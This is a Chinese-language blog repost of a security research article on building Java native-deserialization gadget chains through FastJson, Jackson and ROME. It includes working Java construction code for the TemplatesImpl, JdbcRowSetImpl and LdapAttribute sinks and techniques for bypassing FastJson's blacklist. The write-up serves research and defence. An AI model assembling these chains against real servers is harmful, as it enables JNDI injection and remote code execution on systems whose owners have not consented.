利用特殊反序列化组件攻击原生反序列化入口

最新推荐文章于 2024-03-21 18:13:55 发布
最新推荐文章于 2024-03-21 18:13:55 发布
阅读量322 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/133946372
版权

目录

前言

本文所述攻击的本质是将上述组件中的类拼接到反序列化利用利用链中,打的是Serilizable入口,而不是特殊反序列化入口

攻击原理

利用链分析

readObject()->任意类toString()

HotSwappableTargetSource & XString

BadAttributeValueExpException

EqualsBean

中间部分

toString()->sink

TemplatesImpl#getOutputProperties

JdbcRowSetImpl#getDatabaseMetaData

LdapAttribute#getAttributeDefinition

序列化逻辑分析

FastJson

黑名单检查与绕过

默认构造方法的必要性及其破除

引用类型绕过

缓存

Jackson

getter调用顺序不稳定及解决方式

删除writeplace()方法

Rome

TemplatesImpl

JdbcRowSetImpl

LdapAttribute

多打几次拼运气(×)

找一个没有get方法的父类或接口(×)

1.12.0后的修复

工具实现

参考

前言

所谓特殊反序列化,就是指自实现了序列化/反序列化逻辑的组件,本文主要讨论以下三种

  • FastJson

  • Jackson(SpringBoot原生环境自带)

  • ROME(其实并不是特殊反序列化组件,但因为它也经常出现在toString利用链中,故放到一起讨论)

本文所述攻击的本质是将上述组件中的类拼接到反序列化利用利用链中,打的是Serilizable入口,而不是特殊反序列化入口

篇幅有限,无法对上述组件进行详细介绍,请还没了解的读者自行查阅有关文章

攻击原理

这些组件在实现自己的序列化逻辑(获取对象field值)时,会使用自身类重写的toString方法

这些类的toString方法中,会调用目标类(也就是放在这些类中的Gadget后半部分,例如TemplatesImpl)的getter方法以获取目标类对象中的field值

目标类obj放在这些类

如 jsonObject1.put("g",obj); ToStringBean toStringBean = new ToStringBean(obj.getClass(),obj);

这些类包括:FastJson的JSONObject类、Jackson的POJONode类,ROME的ToStringBean类

目标类getter:TemplatesImpl#getOutputProperties、LdapAttribute#getAttributeDefinition、JdbcRowsetImpl#getDatabaseMetaData

值得一提的是,由于是原生反序列化中的攻击,所以要求利用链上的类都要实现Serilizable接口,因此无法使用BCEL那条链(仅特殊反序列化如FastJson可用)

利用链分析

readObject()->任意类toString()

HotSwappableTargetSource & XString

依赖于SpringAOP

测试代码如下(以JsonObject为例)

public static void main(String[] args) throws Exception {        
        Object templatesimpl = null;
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("g","m");
        JSONObject jsonObject1 = new JSONObject();
        jsonObject1.put("g",templatesimpl);

        HotSwappableTargetSource v1 = new HotSwappableTargetSource(jsonObject);
        HotSwappableTargetSource v2 = new HotSwappableTargetSource(new XString("x"));

        HashMap<Object,Object> hashMap = new HashMap<>();
        hashMap.put(v1,v1);
        hashMap.put(v2,v2);
        setValue(v1,"target",jsonObject1);

//      用于Reference包裹绕过FastJSon高版本resolveClass黑名单检查,from Y4tacker
/*        HashMap<Object,Object> hhhhashMap = new HashMap<>();
        hhhhashMap.put(tpl,hashMap);*/

        serialize(hashMap);
        unserialize("ser.bin");
}

public static void setValue(Object obj,String field,Object value) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj,value);
    }
public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
public static Object unserialize(String Filename) throws IOException,ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

来看一下调用栈

图片

在Xtring#equals方法中,调用了obj2的toString()方法,这个obj2就是HotSwappableTargetSource中和XString对象作比较的templatesimpl对象

public boolean equals(Object obj2)
  {

    if (null == obj2)
      return false;

      // In order to handle the 'all' semantics of
      // nodeset comparisons, we always call the
      // nodeset function.
    else if (obj2 instanceof XNodeSet)
      return obj2.equals(this);
    else if(obj2 instanceof XNumber)
        return obj2.equals(this);
    else
      return str().equals(obj2.toString());
  }
BadAttributeValueExpException

JDK原生可用

这个就很简单了,BadAttributeValueExpException.readObject()直接走到它里面对象的toString

代码如下

Object tpl = null;
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("gg",tpl);
        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,jsonObject);
//      用于Reference包裹绕过FastJSon高版本resolveClass黑名单检查,from Y4tacker
/*        HashMap hashMap = new HashMap();
        hashMap.put(tpl,poc);*/
        serialize(poc);
        unserialize("ser.bin");
BadAttributeValueExpException.readObject()

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ObjectInputStream.GetField gf = ois.readFields();
        Object valObj = gf.get("val", null);

        if (valObj == null) {
            val = null;
        } else if (valObj instanceof String) {
            val= valObj;
        } else if (System.getSecurityManager() == null
                || valObj instanceof Long
                || valObj instanceof Integer
                || valObj instanceof Float
                || valObj instanceof Double
                || valObj instanceof Byte
                || valObj instanceof Short
                || valObj instanceof Boolean) {
            val = valObj.toString(); //在这里调用了里面对象的toString()方法
        } else { // the serialized object is from a version without JDK-8019292 fix
            val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
        }
    }
 }
EqualsBean

依赖于ROME,在其1.12.0版本前均可用

代码如下

ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);
        Object templatesimpl = null;

        HashMap<Object,Object> hashMap = new HashMap<>();
        hashMap.put(equalsBean,"123");

        Field field = toStringBean.getClass().getDeclaredField("obj"); // 低版本(如1.0)此属性名为 _obj
        field.setAccessible(true);
        field.set(toStringBean,templatesimpl);
        serialize(hashMap);
        unserialize("ser.bin");

调用栈如下

图片

另外这条链很多地方都可以替换

  • 由于是在HashMap中调用key.hashCode()作为入口,所以入口类HashMap可以换成Hashtable

  • ObjectBean.hashCode()中会调用EqualsBean.beanHashCode() = EqualsBean.hashCode() 因此可以用ObjectBean替换EqualsBean

中间部分

FastJson的JSONObject类 或 Jackson的POJONode类 或 ROME的ToStringBean类中放好目标类即可

toString()->sink

TemplatesImpl#getOutputProperties

JDK原生可用

这条链早在CC和CB中就用到过,故不多作介绍

三组件均可用,但结合Rome、Jackson使用时需要一些特殊处理,详见后文

JdbcRowSetImpl#getDatabaseMetaData

JDK原生可用

JdbcRowSetImpl jdbcrowsetimpl = new JdbcRowSetImpl();
        String url = "ldap://127.0.0.1:10990";
        jdbcRowset.setDataSourceName(url);

这条链其实就是FastJson Jdbc链的另一种getter触发方式,效果同样是走到connect()中的lookup实现JNDI注入

由于组件序列化逻辑问题,该链仅Rome可用,原因详见后文

LdapAttribute#getAttributeDefinition

JDK原生可用

Object obj = newInstance("com.sun.jndi.ldap.LdapAttribute", new Class<?>[]{String.class},"id");
        setFieldValue(obj, "baseCtxURL", "ldap://127.0.0.1:13562");
        setFieldValue(obj, "rdn", new CompositeName("whocansee"+"//b"));

    public static Object newInstance(String classname, Class<?>[] paramTypes, Object... args) throws NoSuchMethodException, ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException {
        return getConstructor(classname, paramTypes).newInstance(args);
    }
    public static Constructor<?> getConstructor(String classname, Class<?>[] paramTypes) throws ClassNotFoundException, NoSuchMethodException {
        Constructor<?> ctor = Class.forName(classname).getDeclaredConstructor(paramTypes);
        ctor.setAccessible(true);
        return ctor;
    }
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        if(field != null) {
            field.set(obj, value);
        }
    }
    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

此链效果:JNDI注入

由于组件序列化逻辑问题,Rome不可使用该链,原因详见后文

序列化逻辑分析

此部分重点在于分析不同组件不同的序列化逻辑对利用链选用的影响以及绕过安全检查,不会每个都跟进一遍序列化流程,感兴趣的师傅可以自己调试

FastJson

黑名单检查与绕过

了解过FastJson漏洞的师傅一定都知道它的checkAutoType方法,这是其核心防御机制,原本只在FastJson反序列化流程中被触发

然而到了1.2.49以后,JsonObject类中重写了readObject方法,在resolveClass中会对目标类进行checkAutoType检查,本文所述攻击方式会受影响

参考1ue师傅提出的绕过方法,给入口类对象和目标类对象套一层List、Set或Map,以BadAttributeValueExpException入口类为例,代码如下

HashMap hashMap = new HashMap();
hashMap.put(tpl,poc);   
serialize(hashMap);
// tpl即目标类对象(此处为TemplatesImpl类对象) poc即入口类对象(如BadAttributeValueExpException类对象)

从而使得

  • 序列化时,先给外层Map中的目标类对象建立引用映射,再在序列化JsonObject中的目标类对象时以引用类型写入目标类对象

  • 反序列化时,在恢复JsonObject中的目标类对象时,因为它是引用类型,所以不会走到resolveClass方法,实现绕过

至于为什么在恢复引用类型对象时不会调用resolveClass方法,跟进反序列化流程,在此之前有一处判断

switch (tc) {
                case TC_NULL:
                    return readNull();
                case TC_REFERENCE:
                    return readHandle(unshared);
                case TC_CLASS:
                    return readClass(unshared);
                case TC_CLASSDESC:
                case TC_PROXYCLASSDESC:
                    return readClassDesc(unshared);
                case TC_STRING:
                case TC_LONGSTRING:
                    return checkResolve(readString(unshared));
                case TC_ARRAY:
                    return checkResolve(readArray(unshared));
                case TC_ENUM:
                    return checkResolve(readEnum(unshared));
                case TC_OBJECT:
                    return checkResolve(readOrdinaryObject(unshared));
                case TC_EXCEPTION:
                    IOException ex = readFatalException();
                    throw new WriteAbortedException("writing aborted", ex);
                case TC_BLOCKDATA:
                case TC_BLOCKDATALONG:
                    if (oldMode) {
                        bin.setBlockDataMode(true);
                        bin.peek();             // force header read
                        throw new OptionalDataException(
                            bin.currentBlockRemaining());
                    } else {
                        throw new StreamCorruptedException(
                            "unexpected block data");
                    }
                case TC_ENDBLOCKDATA:
                    if (oldMode) {
                        throw new OptionalDataException(true);
                    } else {
                        throw new StreamCorruptedException(
                            "unexpected end of block data");
                    }
                default:
                    throw new StreamCorruptedException(
                        String.format("invalid type code: %02X", tc));
            }

readClassDesc、checkResolve等方法最终都会走到resolveClass 而目标类若为引用类型便会走到TC_REFERENCE 中的readHandle 绕过了resolveClass

也可以简单理解为,在外层Map中的时候就恢复过一次了,有缓存,所以第二次恢复就直接引用了

推广一下这种绕过思路,当Gadget中的某个类在readObject里的resolveClass方法中添加了安全检查,我们只要能顺利通过入口的readObject方法,就可以将黑名单类对象转换为引用类型来绕过检测

而当入口的readObject方法也做了黑名单检测之类的防御时,就需要结合二次反序列化进行绕过了(SignedObject、UnicastRef、JNDI.......)

默认构造方法的必要性及其破除

当JsonObject中的目标类不存在默认构造方法(存在有参构造方法且不定义无参构造方法)时,会出现如下报错:

图片

问题出现在 AliyunCTF2023 #ezbean中,虽然目前的主流sink都不存在这个问题,但我们还是尝试解决一下

引用类型绕过

观察调用栈,发现报错是出在resolveClass->checkAutoType逻辑中,那就可以通过绕过resolveClass来解决问题,具体操作和上个部分一样

缓存

跟进build方法,发现其会遍历一遍目标类的构造方法,如果找不到默认构造方法就会报错,显然build方法内部没有什么可干涉的点

那能否在checkAutoType被调用的前提下,不让build方法被调用呢?看看build方法调用前的代码

if (clazz != null) {
            if (jsonType) {
                TypeUtils.addMapping(typeName, clazz);
                return clazz;
            }

            if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger
                    || javax.sql.DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver
                    || javax.sql.RowSet.class.isAssignableFrom(clazz) //
                    ) {
                throw new JSONException("autoType is not support. " + typeName);
            }

            if (expectClass != null) {
                if (expectClass.isAssignableFrom(clazz)) {
                    TypeUtils.addMapping(typeName, clazz);
                    return clazz;
                } else {
                    throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
                }
            }

            JavaBeanInfo beanInfo = JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy);
            if (beanInfo.creatorConstructor != null && autoTypeSupport) {
                throw new JSONException("autoType is not support. " + typeName);
            }
        }

可以看到,在build之前,会先将类加入到缓存中(开了AutoType且此时已经通过了黑名单检查)

回想一下FastJson 1.2.47版本的绕过方式,如果能从缓存中找到目标类,会在很早的时候就加载类并返回,也就绕过了黑名单检查

借鉴这种思路,我们可以添加缓存,提前返回类,从而避免build中的报错

然而这里有一个区别,1.2.47绕过方式中使用了两个json;第一个json为目标类添加缓存,第二个json实现攻击;并且第一次反序列化不会报错中断流程,所以第二个json才能顺利被反序列化从而完成攻击

而我们现在的情况是:完成攻击需要build A类,而build会报错,解决这个问题需要给A类加缓存,但是在给A类加缓存之后又一定会因为build A类而报错

预想的操作是打两次,第一次加缓存,第二次借助缓存提前返回类,而这需要本次攻击加入的缓存持续生效至下一次攻击

这在报错即终止程序生命周期的情况下一定做不到,比如本地运行serialize & unserialize

好在类缓存是存放在一个名为mappings静态变量中的,在大多数服务器环境下,多试几次就能完成攻击

Jackson

引入以下jar包

图片

嫌麻烦的话直接引入 springframework.boot.spring.starter.web依赖就行

getter调用顺序不稳定及解决方式

这一块已经有师傅写过相关文章,我也就不做重复劳动了

问题原因: https://mp.weixin.qq.com/s/XrAD1Q09mJ-95OXI2KaS9Q

解决方式: https://xz.aliyun.com/t/12846

值得一提的是,Jackson结合LDAPAttribute使用的时候不需要这部分操作,如果添加了反而会出错(当然

删除writeplace()方法

这一块也早就有很多师傅提过,但因为是一个很小的点,并没有专门分析的文章,不太好直接扔个链接,我也就干脆顺便提一下

在Java对象的序列化流程中,如果其类(或父类)拥有writeReplace方法(字面意思,writeObject 替代)就会走到类自己的序列化逻辑

Jackson中的POJONode类就满足这个条件,在序列化的时候便会发生报错(Jackson序列化和Java原生序列化的数据自然是不同的)

解决这个问题有多种思路,我们直接使用Javaassist字节码修改工具,删除BaseJsonNode类中的writeReplace方法即可

CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
        CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
        ctClass.removeMethod(writeReplace);
        ctClass.toClass();

Rome

Rome 1.12.0之前都可以用,注意1.0和后续版本中beanClass、obj的属性名有差别(低版本属性名前会有一个下划线 _ )

TemplatesImpl

Rome结合TemplatesImpl利用时存在和Jackson相似的问题,可能会在调用别的getter时报错而提前终止流程

这里也是采用相似的解决思路,使用Rome时可以直接在ToStringBean里指定从哪个类里获取getter,操作起来很简单

Object templatesImpl = null;
        ToStringBean toStringBean = new ToStringBean(Templates.class,templatesImpl); //在这里指定了从templates.class接口里去获取getter,
                                                                              //其中只有一个getter:getOutputProperties()
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class Bv = Class.forName("javax.management.BadAttributeValueExpException");
        Field val = Bv.getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,toStringBean);
        serialize(badAttributeValueExpException);       
        unserialize("ser.bin");
JdbcRowSetImpl

Rome链可以结合JdbcRowSetImpl使用,乍一看没什么大不了,但对getter调用流程有了解的师傅应该会意识到问题所在

getter的调用是一个一个来的,如果中途报错,流程就会中断,让我们来看看JdbcRowSetImpl里的getter(property:仅A到D)

图片

.......有点太多了,这也是为什么FastJson和Jackson结合JdbcRowSetImpl的利用都是会中途报错的

回到Rome,真的有可能走到我们想要的getter而不报错吗?调试一下Rome结合JdbcRowSetImpl的利用代码

public static void main(String[] args) throws Exception{
        JdbcRowSetImpl jdbcRowset = new JdbcRowSetImpl();
        String url = "ldap://127.0.0.1:10990";
        jdbcRowset.setDataSourceName(url);

        ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class,jdbcRowset);
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class Bv = Class.forName("javax.management.BadAttributeValueExpException");
        Field val = Bv.getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,toStringBean);

        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
    }

getDatabaseMetaData()处下一个断点,得到调用栈

图片

在ToStringBean#toString(String):137Object value = pReadMethod.invoke(_obj,NO_PARAMS); 处下个断点,观察pReadMethod

  • getQueryTimeout

  • getEscapeProcessing

  • getMaxFieldSize

  • getDatabaseMetaData()

  • .............

这个顺序又是怎么决定的呢,中间的过程很无聊,我就不详细说明了,感兴趣的师傅可以自己去调试一下,也没有多复杂

总之最终的调用顺序是按照一个HashMap转换而成的Descriptor(当成List就行)来的,而我们都知道HashMap是根据键的哈希值来确定存储顺序的(相当于随机了)

总之就是在这个机缘巧合之下,getter存放顺序很合适,使得在调用到getDatabaseMetaData()之前都不会报错

从而Rome链可以结合JdbcRowSetImpl使用!

LdapAttribute

Rome链不可以结合LdapAttribute使用,同样是很反直觉的一个现象,让我们看看LdapAttribute中的getter

图片

方法很少,并且都不会强制报错,我们的目标是调用到getAttributeDefinition

按理说没啥问题,在getAttributeDefinition 处下断点,调试一下

public static void main(String[] args) throws Exception{
        Object obj = newInstance("com.sun.jndi.ldap.LdapAttribute", new Class<?>[]{String.class},"id");
        setFieldValue(obj, "baseCtxURL", "ldap://127.0.0.1:11123");
        setFieldValue(obj, "rdn", new CompositeName("whocansee"+"//b"));

        ToStringBean toStringBean = new ToStringBean(obj.getClass(),obj);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Class Bv = Class.forName("javax.management.BadAttributeValueExpException");
        Field val = Bv.getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,toStringBean);

        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
    }
    public static Object newInstance(String classname, Class<?>[] paramTypes, Object... args) throws NoSuchMethodException, ClassNotFoundException, IllegalAccessException, InvocationTargetException, InstantiationException {
        return getConstructor(classname, paramTypes).newInstance(args);
    }
    public static Constructor<?> getConstructor(String classname, Class<?>[] paramTypes) throws ClassNotFoundException, NoSuchMethodException {
        Constructor<?> ctor = Class.forName(classname).getDeclaredConstructor(paramTypes);
        ctor.setAccessible(true);
        return ctor;
    }
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        if(field != null) {
            field.set(obj, value);
        }
    }
    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

没走到想要的断点。把之前研究JdbcRowSetImpl下的断点开一下,慢慢跟

中间的过程很繁琐,低版本Rome就算实际是报错了也不会打印报错信息,根本不知道是哪里抛出的错误。我一步一个断点,痛苦调试快十分钟才找到出错的地方

建议使用高版本Rome,一步到位

图片

PropertyDescriptor#PropertyDescriptor(String,Method,Method) L135:IntrospectionException("bad property name");下断点, 分析结果如下:

LDAPAttribute类有一个get方法:

图片

ROME的序列化逻辑中会获取到它,然后获取pName(propertyName)——什么都没有,随后直接报错

图片

图片

实在是让人哭笑不得的问题,这处设计的用意显然也不是用来防御的,但我们攻击中的这一环恰好就会因此断开

有没有什么办法解决呢?前面也遇到了相似的问题,尝试迁移一下思路

多打几次拼运气(×)

由于getter就这几个,再加上getter调用顺序随机的机制,理论上来说打个几十次大概率能至少有一次成功

可惜的是,这个问题是出在获取getter时,根本都进入不到调用的流程

找一个没有get方法的父类或接口(×)

很可惜,就算找到LdapAttribute的接口Attribute,都仍然有get()方法

目前为止没能发现别的思路,因此Rome链确实是不可以结合LdapAttribute使用的

1.12.0后的修复

Rome链在1.12.0之后的版本不可用了,修复主要集中在对于ToStringBean类的修改

首先是构造方法的修改

private ToStringBean() {}

这一点对于攻击利用来说无伤大雅,真正致命的修复是对toString方法的修改

public static String toString(Class<?> beanClass, Object obj)

老版本的toString()是无参的,其中beanClass(决定了从哪个类里获取getter)和obj(决定调用哪个对象的getter)都是直接用类属性里的,通过构造方法传入或者反射修改类属性的方式都可以操纵这两个关键参数

修复后,这两个参数由调用toString的地方传入

图片

需要两处都可控才有可能继续利用,这么看来显然是不行的了,1.12.0后Rome链确实是不能再利用了

工具实现

本文所述所有payload都可以在wh1t3p1g师傅的ysomap项目中找到(其中有几条是我贡献的XD)

https://github.com/wh1t3p1g/ysomap

My GitHub:https://github.com/whocansee

参考

https://xz.aliyun.com/t/12768

https://paper.seebug.org/2055

https://zhuanlan.zhihu.com/p/638158617

https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/

原文地址:https://xz.aliyun.com/t/12910

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

学习更多渗透技能!体验靶场实战练习

+V【zkaq222】或者下面的扫码不然通不过哦,免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透测试老鸟-九青
关注
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3435
ysoserial这款工具,堪称为“java反序列利用神器”。
Java原生反序列化漏洞利用(URLDNS)
m0_55994898的博客
08-03 250
反序列化漏洞指在代码中存在不安全的反序列化操作(可控的序列化数据流入了反序列化方法中),在绝大多数编程语言中通常都有序列化/反序列化的功能(例如PHP,Java,Python),在序列化/反序列化的过程中通常会自动调用一些固定的方法,在PHP中序列化/反序列化时会调用对应类中的。
java jackson 序列化_Java序列化与反序列化原生方式与Jackson方式)
weixin_36242131的博客
02-12 638
Java序列化与反序列化交流或更多内容请关注我的公众号:nezha_blog当两个进程在进行远程通信时,彼此可以发送各种类型的数据。无论是何种类型的数据,都会以二进制序列的形式在网络上传送。发送方需要把这个Java对象转换为字节序列,才能在网络上传送;接收方则需要把字节序列再恢复为Java对象。现在主要的序列化方式主要是两个种。一种是Java原生以流的方法进行的序列化,另外一种就是Json序列化方...
POJO与JSON的序列化与反序列化
baidu_zhongce的博客
04-27 1万+
0x00 定义以及相关概念POJO,Plain Old Java Object,是一种简单的Java对象,一般就是有一些private属性及其属性getter、setter方法的类。这种对象只能用来装载数据,作为数据存储的载体,而不具有业务逻辑处理的能力。JSON,Javascript Object Notation,是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。其主要构建
反序列化分析
qq_68090416的博客
04-27 69
内存信息被分成小块设置编号 ——>存到硬盘:组装成对象恢复到内存中
从JSON1中学习处理JACKSON的不稳定性
stopys6的博客
09-16 138
本文学习了 JSON1 ,使用 Spring AOP 中的 JdkDynamicAopProxy 作为 gadget,修改 JACKSON ,将以随机顺序触发 TemplatesImpl 上的所有 getter , 转换成了只触发 getOutputProperties ,避免了 JACKSON 的不稳定性,同时, JACKSON 依然可以在 SpringBoot 环境下直接使用。
【Web】记录巅峰极客2023 BabyURL题目复现——Jackson原生
最新发布
uuzeray的博客
03-21 1490
2023巅峰极客 BabyURL之前AliyunCTF Bypassit I这题考查了这样一条子:其实就是Jackson原生反序列化利用今天复现的这题也是大同小异,一起来整一下😋。
【技术推荐】WebLogic 反序列化漏洞深入分析
m0_73257876的博客
09-25 3198
WebLogic 漏洞存在较多的反序列化类和反序列化的途径,在使用黑名单防御手段下,攻击者只要找到新的反序列化触发点,就能造成新的危害。比如,你有一个类 A,类里面有个属性是类 B,这个时候,在反序列化的过程中,就会先反序列化类 A,之后在填充类 A 的过程中,继续反序列化类 B,类 B 在反序列化完成后,填充到类 A 中,同时整个过程都在一个流中操作,这个时候,只要还是 ObjectOutStream 的 read_value进行反序列化操作就不能饶过黑名单!
原生动态化探讨与实现
马甲包开发审核交流群:869685378
04-24 807
现在随着大前端的流行,Native小程序,RN,等看似打着原生旗号的动态化,但开发过程中都会发现非常非常的像在写前端,各种 margin padding align 等,尤其是各大框架看起来都在反复提一个词 FlexBox ,于是我们深入的聊聊在移动端,动态化与跨平台这两个词的发展。 编译动态化 每一行代码本质上他就是一个字符串,他不具备任何的可运行的能力,之所以能被运行是因为他经过了一系列的...
面试框架题整理
热门推荐
Jenius87v5的博客
04-15 2万+
面试题总结 一基础部分 1.1 集合 1.1.1 fail-fast 与 fail-safe 机制有什么区别 1.1.2 说出ArrayList,Vector, LinkedList的存储性能和特性 ArrayList 采用的是数组形式来保存对象的,这种方式将对象放在连续的位置中,所以最大的缺点就是插入删除时非常麻烦 LinkedList 采用的将对象存放在独立的空间中,而且在每个空间中还保存下一个接的索引 但是缺点就是查找非常麻烦 要丛第一个索引开始 ArrayList和Vector都是用数组方
【Web】浅聊Jackson序列化getter的利用——POJONode
uuzeray的博客
03-21 1006
这是我们不希望看到的,所以要在当前classpath下创建个新的BaseJsonNode,并将原来的writeReplace方法删除或注释掉,如此便能正常完成利用相关调用。方法是 Java 中的一个特殊方法,它在序列化过程中起着重要作用。writeValueAsString是jackson序列化自带的入口,在调用该方法的过程中将会通过遍历的方法将。POJONode中不存在有toString方法的实现,在其父类的父类。bean对象中的所有的属性的getter方法进行调用。
Jackson各个gadget的调用
公众号shadow sock7
03-30 1547
参考: http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/ https://www.mi1k7ea.com/2019/11/24/Jackson%E7%B3%BB%E5%88%97%E4%B8%83%E2%80%94%E2%80%94%E5%85%B6...
HotSwappableTargetSource的使用
qq_39839075的博客
06-26 873
这是在Spring AOP中出现的一个类。作用是:可以在代理bean运行过程中,动态更新实际bean对象。HotSwappableTargetSource类实现了TargetSource接口。对外暴露getTarget方法,提供真正的target对象。再说的明白一点,HotSwappableTargetSourc是对真正target对象的封装。在Spring中的源码中,体现在JdkDynamicAopProxy中的invoke方法中。如下图: TargetSource targetSource = this
从JSON1中学习处理JACKSON的不稳定性3
luoxiayan的博客
09-22 63
本文学习了 JSON1 ,使用 Spring AOP 中的 JdkDynamicAopProxy 作为 gadget,修改 JACKSON ,将以随机顺序触发 TemplatesImpl 上的所有 getter , 转换成了只触发 getOutputProperties ,避免了 JACKSON 的不稳定性,同时, JACKSON 依然可以在 SpringBoot 环境下直接使用。
从JSON1中学习处理JACKSON的不稳定性783
woshiyanfu的博客
09-27 57
本文学习了 JSON1 ,使用 Spring AOP 中的 JdkDynamicAopProxy 作为 gadget,修改 JACKSON ,将以随机顺序触发 TemplatesImpl 上的所有 getter , 转换成了只触发 getOutputProperties ,避免了 JACKSON 的不稳定性,同时, JACKSON 依然可以在 SpringBoot 环境下直接使用。
使用Jackson库进行JSON序列化和反序列化
Java技术攻略的博客
03-03 3622
JSON序列化是将Java对象转换为JSON字符串的过程。在JSON序列化过程中,Java对象的属性将被转换为JSON对象的键值对,如果Java对象包含其他Java对象或集合,这些嵌套对象也会被转换为嵌套的JSON对象和JSON数组。JSON反序列化是将JSON字符串转换为Java对象的过程。在JSON反序列化过程中,JSON对象的键值对将被转换为Java对象的属性,如果JSON对象包含其他JSON对象或JSON数组,这些嵌套的JSON也会被转换为嵌套的Java对象和Java集合。
反序列化新的Gadget:com.sun.jndi.ldap.LdapAttribute
公众号shadow sock7
01-14 1180
这个CTF是1.4的Java。同时由于这个类在1.8中依然存在,所以也可以在1.8利用: 一些新手可能会被 ysoserial 里标注的利用依赖库版本所迷惑,认为某个就只能在对应标注的依赖版本下起作用,其实并非如此。像 ysoserial 里 CommonsBeanutils1 这个,作者标注的依赖版本是: commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 但这些版本实际上反映的只是 ysoserial 作者在
java对接ldap_如何使用Java操作LDAP之LDAP连接(一)
weixin_33044131的博客
03-02 1977
JAVA操作LDAP有几种方法,这里主要介绍的是JNDI包,就是它:com.sun.jndi.ldap.LdapCtxFactoryLDAP默认情况下使用的是BDB数据库,所以呢,操作LDAP就和操作数据库一样,要分几步走:1、先导入所需的包,如下:import java.util.ArrayList;import java.util.Hashtable;import javax.naming.C...
JNDI操作LDAP实现(二)
xiaoli
07-15 2459
2.1 JNDI服务提供者   不使用服务提供者就不能用JNDI。一个服务提供者就是一组Java类的集合,它支持开发者同目录服务进行通信,其方式类似于JDBC驱动程序与数据库之间的通信方式。能够用于JNDI的服务提供者必须实现Context接口或Context的扩展接口Directory- Context。   在使用JNDI时,读者只需要了解JNDI,而服务提供者才关注实际的网络协议、编码/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值